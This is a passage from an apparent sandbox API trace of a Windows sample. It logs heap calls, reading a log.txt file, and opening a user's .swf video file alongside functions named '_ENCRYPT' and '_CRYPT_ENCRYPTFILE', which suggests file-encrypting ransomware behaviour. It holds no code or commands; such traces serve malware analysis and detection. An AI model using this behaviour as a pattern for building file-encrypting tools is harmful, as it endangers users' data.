returned 0x8e18b0 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.185] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.185] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.185] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.185] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.185] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.185] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.186] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3b9c, lpOverlapped=0x0) returned 1 [0198.186] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.186] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3b9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.186] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.186] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.186] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.186] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.186] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.186] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.186] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.186] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.187] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd360 [0198.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd360, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.187] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\d8qdzfy_.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.189] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.189] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0198.189] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.189] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.190] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0198.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.190] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.190] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.190] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.190] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.190] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.190] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.190] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x632e5550, ftLastWriteTime.dwHighDateTime=0x1d5e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 0x90add8 [0198.191] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.192] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x632e5550, ftLastWriteTime.dwHighDateTime=0x1d5e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 0x90add8 [0198.192] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.192] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIoo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ioo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oo2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qDzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DzfY_.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.194] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.194] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.194] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.194] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.194] HeapFree (in: hHeap=0x8a0000, 